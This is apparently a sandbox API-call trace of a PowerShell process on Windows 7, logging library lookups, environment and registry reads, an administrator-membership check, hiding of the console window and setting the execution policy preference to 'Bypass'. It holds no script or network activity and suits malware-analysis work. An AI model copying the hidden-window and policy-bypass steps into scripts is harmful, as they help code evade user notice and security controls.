	[0130.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0131.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0131.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0131.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0131.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0133.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.015] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0133.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.015] CoTaskMemFree (pv=0x2b58c0) 
	[0133.018] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0133.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.018] CoTaskMemFree (pv=0x2b58c0) 
	[0133.018] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0133.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.018] CoTaskMemFree (pv=0x2b58c0) 
	[0133.021] CoCreateGuid (in: pguid=0x1bdf78 | out: pguid=0x1bdf78*(Data1=0xf0b20edd, Data2=0x99bd, Data3=0x4301, Data4=([0]=0x81, [1]=0xdc, [2]=0xcd, [3]=0xca, [4]=0x3a, [5]=0x80, [6]=0x84, [7]=0x49))) returned 0x0
	[0133.024] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0133.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.024] CoTaskMemFree (pv=0x2b58c0) 
	[0133.026] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0133.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.026] CoTaskMemFree (pv=0x2b58c0) 
	[0133.029] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0133.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.029] CoTaskMemFree (pv=0x2b58c0) 
	[0133.034] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0133.308] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1bdc20 | out: lpConsoleScreenBufferInfo=0x1bdc20) returned 1
	[0133.313] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0133.313] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1bdc20 | out: lpConsoleScreenBufferInfo=0x1bdc20) returned 1
	[0133.314] GetVersionExW (in: lpVersionInformation=0x1bdbb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1bdbb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0133.316] GetCurrentProcess () returned 0xffffffffffffffff
	[0133.317] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1bdc48 | out: TokenHandle=0x1bdc48*=0x324) returned 1
	[0133.321] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1bdb68 | out: TokenInformation=0x0, ReturnLength=0x1bdb68) returned 0
	[0133.322] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2638c0
	[0133.322] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x2638c0, TokenInformationLength=0x4, ReturnLength=0x1bdb68 | out: TokenInformation=0x2638c0, ReturnLength=0x1bdb68) returned 1
	[0133.324] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1bdcc8 | out: phNewToken=0x1bdcc8*=0x320) returned 1
	[0133.326] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2de4928*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1bdcd8 | out: IsMember=0x1bdcd8) returned 1
	[0133.326] CloseHandle (hObject=0x320) returned 1
	[0133.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.662] GetConsoleWindow () returned 0x40240
	[0136.664] ShowWindow (hWnd=0x40240, nCmdShow=0) returned 0
	[0136.666] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0136.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.666] CoTaskMemFree (pv=0x2b58c0) 
	[0136.844] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.859] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0141.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.834] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
	[0141.834] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2b58c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.834] CoTaskMemFree (pv=0x2b58c0) 
	[0141.835] CoTaskMemAlloc (cb=0xcc) returned 0x2f7390
	[0141.835] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f7390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.836] CoTaskMemFree (pv=0x2f7390) 
	[0141.836] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd938 | out: phkResult=0x1bd938*=0x328) returned 0x0
	[0141.836] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1bd8bc, lpData=0x0, lpcbData=0x1bd8b8*=0x0 | out: lpType=0x1bd8bc*=0x2, lpData=0x0, lpcbData=0x1bd8b8*=0x6c) returned 0x0
	[0141.836] CoTaskMemAlloc (cb=0x70) returned 0x29f100
	[0141.836] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1bd88c, lpData=0x29f100, lpcbData=0x1bd888*=0x6c | out: lpType=0x1bd88c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1bd888*=0x6c) returned 0x0
	[0141.836] CoTaskMemFree (pv=0x29f100) 
	[0141.836] CoTaskMemAlloc (cb=0xcc) returned 0x2f7390
	[0141.836] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2f7390, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.836] CoTaskMemFree (pv=0x2f7390) 
	[0141.836] CoTaskMemAlloc (cb=0xcc) returned 0x2f7390
	[0141.836] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f7390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.836] CoTaskMemFree (pv=0x2f7390) 
	[0141.840] RegCloseKey (hKey=0x328) returned 0x0
	[0141.840] CoTaskMemAlloc (cb=0xcc) returned 0x2f7390
	[0141.840] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f7390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.840] CoTaskMemFree (pv=0x2f7390) 
	[0141.840] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd938 | out: phkResult=0x1bd938*=0x328) returned 0x0
	[0141.840] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1bd8bc, lpData=0x0, lpcbData=0x1bd8b8*=0x0 | out: lpType=0x1bd8bc*=0x0, lpData=0x0, lpcbData=0x1bd8b8*=0x0) returned 0x2
	[0141.840] RegCloseKey (hKey=0x328) returned 0x0
	[0145.886] CoTaskMemAlloc (cb=0x20c) returned 0x1b7a4dd0
	[0145.886] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7a4dd0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.648] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0146.649] GetFileType (hFile=0x334) returned 0x1
	[0146.649] SetErrorMode (uMode=0x1) returned 0x1
	[0146.649] GetFileType (hFile=0x334) returned 0x1
	[0146.653] ReadFile (in: hFile=0x334, lpBuffer=0x2e6ba58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd538, lpOverlapped=0x0 | out: lpBuffer=0x2e6ba58*, lpNumberOfBytesRead=0x1bd538*=0x1000, lpOverlapped=0x0) returned 1
	[0146.656] ReadFile (in: hFile=0x334, lpBuffer=0x2e6ba58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd538, lpOverlapped=0x0 | out: lpBuffer=0x2e6ba58*, lpNumberOfBytesRead=0x1bd538*=0x1000, lpOverlapped=0x0) returned 1
	[0146.729] ReadFile (in: hFile=0x334, lpBuffer=0x2e6ba58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd538, lpOverlapped=0x0 | out: lpBuffer=0x2e6ba58*, lpNumberOfBytesRead=0x1bd538*=0x1000, lpOverlapped=0x0) returned 1
	[0146.730] ReadFile (in: hFile=0x334, lpBuffer=0x2e6ba58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd538, lpOverlapped=0x0 | out: lpBuffer=0x2e6ba58*, lpNumberOfBytesRead=0x1bd538*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.730] ReadFile (in: hFile=0x334, lpBuffer=0x2e6aeb3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1bd538, lpOverlapped=0x0 | out: lpBuffer=0x2e6aeb3*, lpNumberOfBytesRead=0x1bd538*=0x0, lpOverlapped=0x0) returned 1
	[0146.730] ReadFile (in: hFile=0x334, lpBuffer=0x2e6ba58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bd538, lpOverlapped=0x0 | out: lpBuffer=0x2e6ba58*, lpNumberOfBytesRead=0x1bd538*=0x0, lpOverlapped=0x0) returned 1
	[0146.732] CloseHandle (hObject=0x334) returned 1
	[0148.325] GetSystemInfo (in: lpSystemInfo=0x1bc1d0 | out: lpSystemInfo=0x1bc1d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.326] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.509] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.048] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.061] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0157.062] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.285] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.286] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.288] VirtualQuery (in: lpAddress=0x1bc280, lpBuffer=0x1bd140, dwLength=0x30 | out: lpBuffer=0x1bd140*(BaseAddress=0x1bc000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.294] CoTaskMemAlloc (cb=0x104) returned 0x2b58c0
